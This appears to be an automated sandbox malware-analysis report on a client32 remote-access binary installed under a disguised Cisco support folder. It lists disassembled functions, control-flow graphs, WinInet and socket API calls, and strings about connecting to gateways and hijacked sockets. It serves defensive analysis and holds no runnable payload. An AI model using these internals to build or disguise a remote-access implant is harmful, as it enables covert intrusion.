                                                                                                                                        • API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
                                                                                                                                        • String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
                                                                                                                                        • API String ID: 3291243470-2792520954
                                                                                                                                        • Opcode ID: 7d2eca5f92aeb90d6110f97020967db0a84e126fbda8524f3f6ea0900cc0b1d0
                                                                                                                                        • Instruction ID: d0fdbac131d557a40c9b368ac235ec40647fb92da06757c3bb5e6f0a5f2f1ed9
                                                                                                                                        • Opcode Fuzzy Hash: 7d2eca5f92aeb90d6110f97020967db0a84e126fbda8524f3f6ea0900cc0b1d0
                                                                                                                                        • Instruction Fuzzy Hash: 2F1270B5E002599FDB20DF65CCD4AAEB7FAFB88304F0045A9E60D97240E771A984CF61
                                                                                                                                        Function 68907030 Relevance: 91.4, APIs: 21, Strings: 31, Instructions: 406threadlibrarysynchronizationCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 742 68907030-68907050 call 688f2a90 call 6890dbd0 747 68907052-68907095 LoadLibraryA 742->747 748 68907097 742->748 749 68907099-689070f8 call 688f8d00 InitializeCriticalSection CreateEventA 747->749 748->749 752 68907111-6890711e CreateEventA 749->752 753 689070fa-6890710e call 688f6f50 749->753 755 68907120-68907134 call 688f6f50 752->755 756 68907137-68907144 CreateEventA 752->756 753->752 755->756 759 68907146-6890715a call 688f6f50 756->759 760 6890715d-68907170 WSAStartup 756->760 759->760 761 68907172-68907182 call 688f5290 call 688f2b70 760->761 762 68907183-689071b2 call 68911b69 760->762 771 689071d0-689071e4 call 68911c50 762->771 772 689071b4-689071cd call 688f6f50 762->772 778 689071e6-689071e9 771->778 779 689071fa-68907202 771->779 772->771 778->779 780 689071eb-689071f1 778->780 781 68907204 779->781 782 68907209-68907223 call 68913753 779->782 780->779 783 689071f3-689071f8 780->783 781->782 786 68907225-68907239 call 688f6f50 782->786 787 6890723c-68907255 call 68909bf0 782->787 783->782 786->787 792 68907257-6890725e 787->792 793 6890726a-68907271 call 688f5730 787->793 795 68907260-68907268 792->795 797 68907277-6890729a call 68911b69 793->797 798 6890730b-68907310 793->798 795->793 795->795 805 6890729c-689072bb call 688f6f50 797->805 806 689072be-689072dc call 68911c50 call 68911b69 797->806 800 68907312-68907315 798->800 801 6890731e-68907336 call 688f5e90 call 688f5530 798->801 800->801 802 68907317-6890731c 800->802 807 68907339-68907354 call 688f5e90 801->807 802->801 802->807 805->806 826 689072fa-68907308 call 68911c50 806->826 827 689072de-689072f7 call 688f6f50 806->827 818 68907361-6890738b GetTickCount CreateThread 807->818 819 68907356-6890735c 807->819 820 689073a9-689073b6 SetThreadPriority 818->820 821 6890738d-689073a6 call 688f6f50 818->821 819->818 824 689073b8-689073cc call 688f6f50 820->824 825 689073cf-689073ed call 688f5f20 call 688f5e90 820->825 821->820 824->825 839 689073f5-689073f7 825->839 840 689073ef 825->840 826->798 827->826 841 68907425-68907447 GetModuleFileNameA call 688f2420 839->841 842 689073f9-68907407 call 6890dbd0 839->842 840->839 849 68907449-6890744a 841->849 850 6890744c 841->850 847 68907409-6890741c call 688f4580 842->847 848 6890741e 842->848 852 68907420 847->852 848->852 853 68907451-6890746d 849->853 850->853 852->841 855 68907470-6890747f 853->855 855->855 856 68907481-68907486 855->856 857 68907487-6890748d 856->857 857->857 858 6890748f-689074c8 GetPrivateProfileIntA GetModuleHandleA 857->858 859 68907563-6890758f CreateMutexA timeBeginPeriod 858->859 860 689074ce-689074fa call 688f5e90 * 2 858->860 865 68907536-6890755d call 688f5e90 * 2 860->865 866 689074fc-68907511 call 688f5e90 860->866 865->859 871 68907513-68907528 call 688f5e90 866->871 872 6890752a-68907530 866->872 871->865 871->872 872->865
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 688F2A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 688F2ACB
                                                                                                                                          • Part of subcall function 688F2A90: _strrchr.LIBCMT ref: 688F2ADA
                                                                                                                                          • Part of subcall function 688F2A90: _strrchr.LIBCMT ref: 688F2AEA
                                                                                                                                          • Part of subcall function 688F2A90: wsprintfA.USER32 ref: 688F2B05
                                                                                                                                          • Part of subcall function 6890DBD0: _malloc.LIBCMT ref: 6890DBE9
                                                                                                                                          • Part of subcall function 6890DBD0: wsprintfA.USER32 ref: 6890DC04
                                                                                                                                          • Part of subcall function 6890DBD0: _memset.LIBCMT ref: 6890DC27
                                                                                                                                        • LoadLibraryA.KERNEL32(WinInet.dll), ref: 68907057
                                                                                                                                        • InitializeCriticalSection.KERNEL32(6893B898), ref: 689070DF
                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 689070EF
                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 68907115
                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6890713B
                                                                                                                                        • WSAStartup.WSOCK32(00000101,6893B91A), ref: 68907167
                                                                                                                                        • _malloc.LIBCMT ref: 689071A3
                                                                                                                                          • Part of subcall function 68911B69: __FF_MSGBANNER.LIBCMT ref: 68911B82
                                                                                                                                          • Part of subcall function 68911B69: __NMSG_WRITE.LIBCMT ref: 68911B89
                                                                                                                                          • Part of subcall function 68911B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6891D3C1,68916E81,00000001,68916E81,?,6891F447,00000018,68937738,0000000C,6891F4D7), ref: 68911BAE
                                                                                                                                        • _memset.LIBCMT ref: 689071D3
                                                                                                                                        • _calloc.LIBCMT ref: 68907214
                                                                                                                                        • _malloc.LIBCMT ref: 6890728B
                                                                                                                                        • _memset.LIBCMT ref: 689072C1
                                                                                                                                        • _malloc.LIBCMT ref: 689072CD
                                                                                                                                        • _memset.LIBCMT ref: 68907303
                                                                                                                                        • GetTickCount.KERNEL32 ref: 68907361
                                                                                                                                        • CreateThread.KERNEL32(00000000,00004000,68906BA0,00000000,00000000,6893BACC), ref: 6890737E
                                                                                                                                        • SetThreadPriority.KERNEL32(00000000,00000001), ref: 689073AC
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Cisco\Support\,00000104), ref: 68907430
                                                                                                                                        • GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,mode,00000000,C:\Users\user\AppData\Roaming\Cisco\Support\pci.ini), ref: 689074B0
                                                                                                                                        • GetModuleHandleA.KERNEL32(nsmtrace), ref: 689074C0
                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 68907566
                                                                                                                                        • timeBeginPeriod.WINMM(00000001), ref: 68907573
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Create$_malloc_memset$EventModule$FileNameThread_strrchrwsprintf$AllocateBeginCountCriticalHandleHeapInitializeLibraryLoadMutexPeriodPriorityPrivateProfileSectionStartupTick_calloctime
                                                                                                                                        • String ID: (iflags & CTL_REMOTE) == 0$*CMPI$*DisconnectTimeout$0/#v$305090$C:\Users\user\AppData\Roaming\Cisco\Support\$C:\Users\user\AppData\Roaming\Cisco\Support\pci.ini$General$HTCTL32$NSM832428$NetworkSpeed$Support\$Trace$TraceFile$TraceRecv$TraceSend$WinInet.dll$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$htctl.packet_tracing$mode$nsmtrace$pci.ini$sv.ResumeEvent$sv.gateways$sv.hRecvThread$sv.hRecvThreadReadyEvent$sv.hResponseEvent$sv.s$sv.subset.omit$sv.subset.subset
                                                                                                                                        • API String ID: 3160247386-123846317
                                                                                                                                        • Opcode ID: 5c7f180f713cabddc1d034d81c28a02f89e5e25c8dea5ebc011a0fb5b6c07217
                                                                                                                                        • Instruction ID: 69d9dd3be34a192283faf954134301041b0feda1eaacefe08ebbc92e87aa7e8f
                                                                                                                                        • Opcode Fuzzy Hash: 5c7f180f713cabddc1d034d81c28a02f89e5e25c8dea5ebc011a0fb5b6c07217
                                                                                                                                        • Instruction Fuzzy Hash: FCD1D4B5948734BFDB309FAC9C85A1E7AF8EB4A35CBC04829F559D7241E731E8408B91
                                                                                                                                        Function 11029230 Relevance: 84.5, APIs: 36, Strings: 12, Instructions: 534libraryloadernetworkCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 877 11029230-110292be LoadLibraryA 878 110292c1-110292c6 877->878 879 110292c8-110292cb 878->879 880 110292cd-110292d0 878->880 881 110292e5-110292ea 879->881 882 110292d2-110292d5 880->882 883 110292d7-110292e2 880->883 884 11029319-11029325 881->884 885 110292ec-110292f1 881->885 882->881 883->881 888 110293ca-110293cd 884->888 889 1102932b-11029343 call 1115f321 884->889 886 110292f3-1102930a GetProcAddress 885->886 887 1102930c-1102930f 885->887 886->887 890 11029311-11029313 SetLastError 886->890 887->884 892 110293e8-11029400 InternetOpenA 888->892 893 110293cf-110293e6 GetProcAddress 888->893 899 11029364-11029370 889->899 900 11029345-1102935e GetProcAddress 889->900 890->884 897 11029424-11029430 call 1115f3b5 892->897 893->892 896 11029419-11029421 SetLastError 893->896 896->897 903 11029436-11029467 call 1113e8f0 call 11160b10 897->903 904 110296aa-110296b4 897->904 906 11029372-1102937b GetLastError 899->906 909 11029391-11029393 899->909 900->899 902 11029402-1102940a SetLastError 900->902 902->906 928 11029469-1102946c 903->928 929 1102946f-11029484 call 11080b10 * 2 903->929 904->878 908 110296ba 904->908 906->909 910 1102937d-1102938f call 1115f3b5 call 1115f321 906->910 913 110296cc-110296cf 908->913 914 110293b0-110293bc 909->914 915 11029395-110293ae GetProcAddress 909->915 910->909 919 110296d1-110296d6 913->919 920 110296db-110296de 913->920 914->888 932 110293be-110293c7 914->932 915->914 918 1102940f-11029417 SetLastError 915->918 918->888 924 1102983f-11029847 919->924 925 110296e0-110296e5 920->925 926 110296ea 920->926 930 11029850-11029863 924->930 931 11029849-1102984a FreeLibrary 924->931 933 1102980f-11029814 925->933 934 110296ed-110296f5 926->934 928->929 952 11029486-1102948a 929->952 953 1102948d-11029499 929->953 931->930 932->888 935 11029816-1102982d GetProcAddress 933->935 936 1102982f-11029835 933->936 938 110296f7-1102970e GetProcAddress 934->938 939 11029714-1102971d 934->939 935->936 940 11029837-11029839 SetLastError 935->940 936->924 938->939 942 110297ce-110297d0 SetLastError 938->942 943 11029720-11029722 939->943 940->924 945 110297d6-110297dd 942->945 943->945 947 11029728-1102972d 943->947 948 110297ec-1102980d call 11027510 * 2 945->948 947->948 950 11029733-1102976f call 1110c4a0 call 110274c0 947->950 948->933 978 11029781-11029783 950->978 979 11029771-11029774 950->979 952->953 954 110294c4-110294c9 953->954 955 1102949b-1102949d 953->955 961 110294cb-110294dc GetProcAddress 954->961 962 110294de-110294f5 InternetConnectA 954->962 958 110294b4-110294ba 955->958 959 1102949f-110294b2 GetProcAddress 955->959 958->954 959->958 965 110294bc-110294be SetLastError 959->965 961->962 967 11029521-1102952c SetLastError 961->967 968 11029697-110296a7 call 1115e091 962->968 969 110294fb-110294fe 962->969 965->954 967->968 968->904 973 11029500-11029502 969->973 974 11029539-11029541 969->974 980 11029504-11029517 GetProcAddress 973->980 981 11029519-1102951f 973->981 976 11029543-11029557 GetProcAddress 974->976 977 11029559-11029574 974->977 976->977 982 11029576-1102957e SetLastError 976->982 988 11029581-11029584 977->988 984 11029785 978->984 985 1102978c-11029791 978->985 979->978 983 11029776-1102977a 979->983 980->981 986 11029531-11029533 SetLastError 980->986 981->974 982->988 983->978 989 1102977c 983->989 984->985 990 11029793-110297a9 call 110cedc0 985->990 991 110297ac-110297ae 985->991 986->974 995 11029692-11029695 988->995 996 1102958a-1102958f 988->996 989->978 990->991 993 110297b0-110297b2 991->993 994 110297b4-110297c5 call 1115e091 991->994 993->994 1000 110297df-110297e9 call 1115e091 993->1000 994->948 1008 110297c7-110297c9 994->1008 995->968 998 110296bc-110296c9 call 1115e091 995->998 1002 11029591-110295a8 GetProcAddress 996->1002 1003 110295aa-110295b6 996->1003 998->913 1000->948 1002->1003 1007 110295b8-110295c0 SetLastError 1002->1007 1012 110295c2-110295db GetLastError 1003->1012 1007->1012 1008->934 1013 110295f6-1102960b 1012->1013 1014 110295dd-110295f4 GetProcAddress 1012->1014 1017 11029615-11029623 GetLastError 1013->1017 1014->1013 1015 1102960d-1102960f SetLastError 1014->1015 1015->1017 1018 11029625-1102962a 1017->1018 1019 1102962c-11029638 GetDesktopWindow 1017->1019 1018->1019 1020 11029682-11029687 1018->1020 1021 11029653-1102966f 1019->1021 1022 1102963a-11029651 GetProcAddress 1019->1022 1020->995 1024 11029689-1102968f 1020->1024 1021->995 1026 11029671 1021->1026 1022->1021 1023 11029676-11029680 SetLastError 1022->1023 1023->995 1024->995 1026->988
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(WinInet.dll,A0A8B03E,762323A0,?,00000000), ref: 11029265
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110292FF
                                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 11029313
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029351
                                                                                                                                        • GetLastError.KERNEL32 ref: 11029372
                                                                                                                                        • _free.LIBCMT ref: 1102937E
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 110293A1
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 110293DB
                                                                                                                                        • InternetOpenA.WININET(11190240,?,?,000000FF,00000000), ref: 110293FA
                                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 11029404
                                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 11029411
                                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 1102941B
                                                                                                                                        • _free.LIBCMT ref: 11029425
                                                                                                                                          • Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
                                                                                                                                          • Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110294A5
                                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 110294BE
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 110294D1
                                                                                                                                        • InternetConnectA.WININET(000000FF,111955E0,00000050,00000000,00000000,00000003,00000000,00000000), ref: 110294EE
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102950A
                                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 11029523
                                                                                                                                        • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 11029549
                                                                                                                                        • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 1102959D
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 11029703
                                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 110297D0
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029822
                                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 11029839
                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 1102984A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$ErrorLast$FreeInternetLibrary_free$ConnectHeapLoadOpen
                                                                                                                                        • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                                                                                                        • API String ID: 3391987931-913974648
                                                                                                                                        • Opcode ID: a36c1f7c4d09e11b0cf3eaec22f6cfdc2bb90b64aa9f30ea6b191bd58b9bb04b
                                                                                                                                        • Instruction ID: 8a892d803199c7046cb733a2a01a4e5fa1610c0a6219e27d09306c56163d799e
                                                                                                                                        • Opcode Fuzzy Hash: a36c1f7c4d09e11b0cf3eaec22f6cfdc2bb90b64aa9f30ea6b191bd58b9bb04b
                                                                                                                                        • Instruction Fuzzy Hash: AA127FB1E002299BDB11CFA9CC88A9EFBF4FF88344F60856AE555F7240EB745940CB61
                                                                                                                                        Function 688FA980 Relevance: 56.4, APIs: 28, Strings: 4, Instructions: 389networkCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1415 688fa980-688fa9e7 call 688f5840 1418 688fa9ed-688fa9f0 1415->1418 1419 688faa9c 1415->1419 1418->1419 1421 688fa9f6-688fa9fb 1418->1421 1420 688faaa2-688faaae 1419->1420 1422 688faac6-688faacd 1420->1422 1423 688faab0-688faac5 call 689128e1 1420->1423 1421->1419 1424 688faa01-688faa06 1421->1424 1425 688faacf-688faad7 1422->1425 1426 688fab48-688fab58 socket 1422->1426 1424->1419 1428 688faa0c-688faa21 EnterCriticalSection 1424->1428 1425->1426 1431 688faad9-688faadc 1425->1431 1432 688fab5a-688fab6f WSAGetLastError call 689128e1 1426->1432 1433 688fab70-688fabc9 #21 * 2 call 688f5e90 1426->1433 1429 688faa89-688faa9a LeaveCriticalSection 1428->1429 1430 688faa23-688faa2b 1428->1430 1429->1420 1436 688faa30-688faa39 1430->1436 1431->1426 1437 688faade-688fab05 call 688fa5c0 1431->1437 1444 688fabcb-688fabe3 #21 1433->1444 1445 688fabe8-688fac1f bind 1433->1445 1440 688faa3b-688faa3f 1436->1440 1441 688faa49-688faa51 1436->1441 1452 688fab0b-688fab2f WSAGetLastError call 688f30a0 1437->1452 1453 688fad4a-688fad69 EnterCriticalSection 1437->1453 1440->1441 1446 688faa41-688faa47 1440->1446 1441->1436 1448 688faa53-688faa5e LeaveCriticalSection 1441->1448 1444->1445 1449 688fac41-688fac49 1445->1449 1450 688fac21-688fac40 WSAGetLastError closesocket call 689128e1 1445->1450 1446->1441 1451 688faa60-688faa88 LeaveCriticalSection call 689128e1 1446->1451 1448->1420 1457 688fac4b-688fac57 1449->1457 1458 688fac59-688fac64 1449->1458 1466 688fae82-688fae92 call 689128e1 1452->1466 1469 688fab35-688fab47 call 689128e1 1452->1469 1459 688fad6f-688fad7d 1453->1459 1460 688fae50-688fae80 LeaveCriticalSection GetTickCount InterlockedExchange 1453->1460 1465 688fac65-688fac83 htons WSASetBlockingHook call 688f7610 1457->1465 1458->1465 1461 688fad80-688fad86 1459->1461 1460->1466 1467 688fad88-688fad90 1461->1467 1468 688fad97-688fae0f InitializeCriticalSection call 688f8fb0 call 68910ef0 1461->1468 1475 688fac88-688fac8d 1465->1475 1467->1461 1472 688fad92 1467->1472 1490 688fae18-688fae4b getsockname 1468->1490 1491 688fae11 1468->1491 1472->1460 1479 688fac8f-688facc5 WSAGetLastError WSAUnhookBlockingHook closesocket call 688f30a0 call 689128e1 1475->1479 1480 688facc6-688faccd 1475->1480 1481 688faccf-688facd6 1480->1481 1482 688fad45 WSAUnhookBlockingHook 1480->1482 1481->1482 1485 688facd8-688facfb call 688fa5c0 1481->1485 1482->1453 1485->1482 1494 688facfd-688fad2c WSAGetLastError WSAUnhookBlockingHook closesocket call 688f30a0 1485->1494 1490->1460 1491->1490 1494->1466 1497 688fad32-688fad44 call 689128e1 1494->1497
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 688F5840: inet_ntoa.WSOCK32(00000080,?,00000000,?,688F8F91,00000000,00000000,6893B8DA,?,00000080), ref: 688F5852
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,?,00000000,00000000), ref: 688FAA11
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 688FAA58
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 688FAA68
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 688FAA94
                                                                                                                                        • WSAGetLastError.WSOCK32(?,?,?,?,?,00000000,00000000), ref: 688FAB0B
                                                                                                                                        • socket.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 688FAB4E
                                                                                                                                        • WSAGetLastError.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 688FAB5A
                                                                                                                                        • #21.WSOCK32(00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 688FAB8E
                                                                                                                                        • #21.WSOCK32(00000000,0000FFFF,00000080,?,00000004,00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 688FABB1
                                                                                                                                        • #21.WSOCK32(00000000,00000006,00000001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 688FABE3
                                                                                                                                        • bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 688FAC18
                                                                                                                                        • WSAGetLastError.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 688FAC21
                                                                                                                                        • closesocket.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 688FAC29
                                                                                                                                        • htons.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 688FAC65
                                                                                                                                        • WSASetBlockingHook.WSOCK32(688F63A0,00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 688FAC76
                                                                                                                                        • WSAGetLastError.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 688FAC8F
                                                                                                                                        • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 688FAC96
                                                                                                                                        • closesocket.WSOCK32(00000000,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 688FAC9C
                                                                                                                                        • WSAGetLastError.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 688FACFD
                                                                                                                                        • WSAUnhookBlockingHook.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 688FAD04
                                                                                                                                        • closesocket.WSOCK32(00000000,?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 688FAD0A
                                                                                                                                        • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 688FAD45
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 688FAD4F
                                                                                                                                        • InitializeCriticalSection.KERNEL32(-6893CB4A), ref: 688FADE6
                                                                                                                                          • Part of subcall function 688F8FB0: _memset.LIBCMT ref: 688F8FE4
                                                                                                                                          • Part of subcall function 688F8FB0: getsockname.WSOCK32(?,?,00000010,?,025E2EF8,?), ref: 688F9005
                                                                                                                                        • getsockname.WSOCK32(00000000,?,?), ref: 688FAE4B
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 688FAE60
                                                                                                                                        • GetTickCount.KERNEL32 ref: 688FAE6C
                                                                                                                                        • InterlockedExchange.KERNEL32(?,00000000), ref: 688FAE7A
                                                                                                                                        Strings
                                                                                                                                        • *TcpNoDelay, xrefs: 688FABB8
                                                                                                                                        • Connect error to %s using hijacked socket, error %d, xrefs: 688FAB17
                                                                                                                                        • Cannot connect to gateway %s via web proxy, error %d, xrefs: 688FAD14
                                                                                                                                        • Cannot connect to gateway %s, error %d, xrefs: 688FACA6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$ErrorLast$BlockingHookLeave$Unhookclosesocket$Entergetsockname$CountExchangeInitializeInterlockedTick_memsetbindhtonsinet_ntoasocket
                                                                                                                                        • String ID: *TcpNoDelay$Cannot connect to gateway %s via web proxy, error %d$Cannot connect to gateway %s, error %d$Connect error to %s using hijacked socket, error %d
                                                                                                                                        • API String ID: 692187944-2561115898
                                                                                                                                        • Opcode ID: 236334495597b7b7824bf2c753d37ee01193a38125fd26e185cc1d420e41b778
                                                                                                                                        • Instruction ID: ce5c5e15d9978a25e8b83696e03547251ddcda56d6bc5fd5b062f68c347c3aa8
                                                                                                                                        • Opcode Fuzzy Hash: 236334495597b7b7824bf2c753d37ee01193a38125fd26e185cc1d420e41b778
                                                                                                                                        • Instruction Fuzzy Hash: 71E1C575A08219AFDB20DF98D840BEDB3B5FF89354F8045AAE91EA7280D7309E45CB51
                                                                                                                                        Function 688F91F0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 97sleepnetworkCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • #16.WSOCK32(00000000,009686C7,68903361,00000000,00000000,68903361,00000007), ref: 688F924C
                                                                                                                                        • WSAGetLastError.WSOCK32(00000000,009686C7,68903361,00000000,00000000,68903361,00000007), ref: 688F925B
                                                                                                                                        • GetTickCount.KERNEL32 ref: 688F9274
